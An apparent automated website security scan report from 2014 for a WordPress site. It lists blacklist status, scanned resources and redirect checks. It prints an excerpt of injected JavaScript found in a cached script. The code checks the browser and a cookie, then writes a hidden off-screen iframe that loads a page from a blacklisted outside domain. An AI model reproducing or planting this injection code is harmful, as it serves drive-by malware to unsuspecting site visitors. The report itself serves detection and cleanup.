Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iloverecovery.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://iloverecovery.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iloverecovery.com/ | 200 OK Content-Length: 38397 Content-Type: text/html | clean |
http://iloverecovery.com/wp-content/w3tc/min/index.php?file=e1da50c8.347245.js | 200 OK Content-Length: 136432 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: stigelmastu.gostareshbazar.net
...[160 bytes skipped]... pize?decodeURIComponent(Smilepize[1]):undefined;} function Pleos_Aflertuder(){var r_amblartide=navigator.userAgent;var Yellowgrand=(r_amblartide.indexOf("IEMobile")>-1||r_amblartide.indexOf("Windows NT 6.3")>-1||r_amblartide.indexOf("Chrome")>-1||r_amblartide.indexOf("Windows")<+1);var Ultrastilus=(getCookie("Garamg18usality")===undefined);if(!Yellowgrand&&Ultrastilus){document.write('<iframe src="http://stigelmastu.gostareshbazar.net/brabuislaoi16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>');var date=new Date(new Date().getTime()+66*60*60*1000);document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString();}} Pleos_Aflertuder();function convertEntities(b){var d,a;d=fun ...[2968 bytes skipped]...
Malicious iFrame found. size: 100x100 src: http://stigelmastu.gostareshbazar.net/brabuislaoi16.html
This URL is marked by Google as suspicious
<iframe src="http://stigelmastu.gostareshbazar.net/brabuislaoi16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;">
http://iloverecovery.com/index.php?ak_action=aktt_js&v=2.4 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://partner.googleadservices.com/gampad/google_service.js | 200 OK Content-Length: 3868 Content-Type: text/javascript | clean |
http://stats.wordpress.com/e-201437.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://twitter.com/javascripts/blogger.js | HTTP/1.1 301 Moved Permanently Date: Mon, 15 Sep 2014 01:00:32 UTC Location: https://twitter.com/javascripts/blogger.js Server: tsa_a Content-Length: 0 Set-Cookie: guest_id=v1%3A141074283294241739; Domain=.twitter.com; Path=/; Expires=Wed, 14-Sep-2016 01:00:32 UTC X-Connection-Hash: 487da09786125417855b214af4421775 | clean |
https://twitter.com/javascripts/blogger.js | 404 Not Found Content-Length: 4311 Content-Type: text/html | clean |
https://abs.twimg.com/errors/404-4f54405af9c0bcdecbe656ca8893f7a9.js | 200 OK Content-Length: 10803 Content-Type: application/javascript | clean |
https://twitter.com/ | 200 OK Content-Length: 55684 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/en/init.22da4aa566c643ee186bfaef8f1b23242f30c8e0.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=id | 200 OK Content-Length: 56142 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/id/init.e6c1ece0bb69710333d48f0033be5625111bddba.js | 200 OK Content-Length: 303549 Content-Type: application/javascript | clean |
https://twitter.com/?lang=msa | 200 OK Content-Length: 56310 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/msa/init.847587320b11ec0e2588f620c9f02da5be5ba402.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=cs | 200 OK Content-Length: 56582 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/cs/init.98699024350dd196411a1e82ec30a844cc59029b.js | 200 OK Content-Length: 303263 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iloverecovery.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 01:00:27 GMT
Accept-Ranges: bytes
Server: Apache/2.2.22
Vary: Accept-Encoding,Cookie
Content-Length: 38397
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 14 Sep 2014 10:09:10 GMT
X-Pingback: http://iloverecovery.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.2.4
...38397 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iloverecovery.com
Referer: http://www.google.com/search?q=iloverecovery.com
Result:
The result is similar to the first query. There are no suspicious redirects found.